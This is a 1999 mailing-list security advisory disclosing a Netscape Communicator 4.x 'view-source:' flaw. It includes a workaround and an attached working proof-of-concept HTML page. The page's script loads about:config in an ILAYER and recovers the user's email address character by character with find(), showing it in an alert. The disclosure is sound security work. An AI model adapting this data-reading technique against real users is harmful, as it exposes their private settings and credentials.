Date: Tue, 1 Jun 1999 19:08:49 +0300
From: Georgi Guninski <[email protected]>
To: [email protected]
Subject: Netscape Communicator "view-source:" security vulnerabilities
This is a multi-part message in MIME format.
--------------6718BA18997C30F69282E3B5
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
There is a security vulnerability in Netscape Communicator 4.6 Win95,
4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
in a "view-source" window.
The problem is that it allows access to documents included in the parent
document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
the whole parsed document.
Vulnerabilities:
Browsing local directories
Reading user's cache
Reading parsed HTML files
Reading Netscape's configuration ("about:config") including user's
email address, mail servers and password.
Probably others
This vulnerability may be exploited by using an HTML email message.
Workaround: Disable JavaScript
Netscape has been notified about the problem.
Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
--------------6718BA18997C30F69282E3B5
Content-Type: text/html; charset=koi8-r;
name="viewsource.html"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="viewsource.html"
<HTML>
<BODY>
There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way
it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
The problem is that it allows access to documents included in the parent document via
ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
<BR>
Vulnerabilities:
<HR>
Browsing local directories<BR>
Reading user's cache<BR>
Reading parsed HTML files<BR>
Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
Probably others<BR>
<BR>
This vulnerability may be exploited by using an HTML email message.
<HR>
Workaround: Disable JavaScript
<HR>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<SCRIPT>
// Build a "view-source:wysiwyg://1/javascript:" URL whose payload is itself a
// small page: a title, an ILAYER that loads about:config into the view-source
// window, and a script that reads the rendered text back with find().
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
// mag is the text that precedes the value being recovered; res accumulates the
// recovered text starting from it. mend is a fixed anchor string: find(mend)
// moves the search position to it each round so that the following
// find(t,true,true) (Netscape's find(text, caseSensitive, backwards)) is
// evaluated from the same place every time.
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
// Wait three seconds for the ILAYER to load before searching its text.
+"setTimeout(\" "
// Recover up to charstoread characters one at a time: try every character
// code 1..255 appended to what is already known and keep the one find() accepts.
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
// A space (code 32) ends the value, so end the outer loop as well.
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
// Strip the "mail.identity.useremail = " prefix and show what was recovered.
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
// Navigate the current window to the crafted URL.
location=s;
</SCRIPT>
</BODY>
</HTML>
--------------6718BA18997C30F69282E3B5--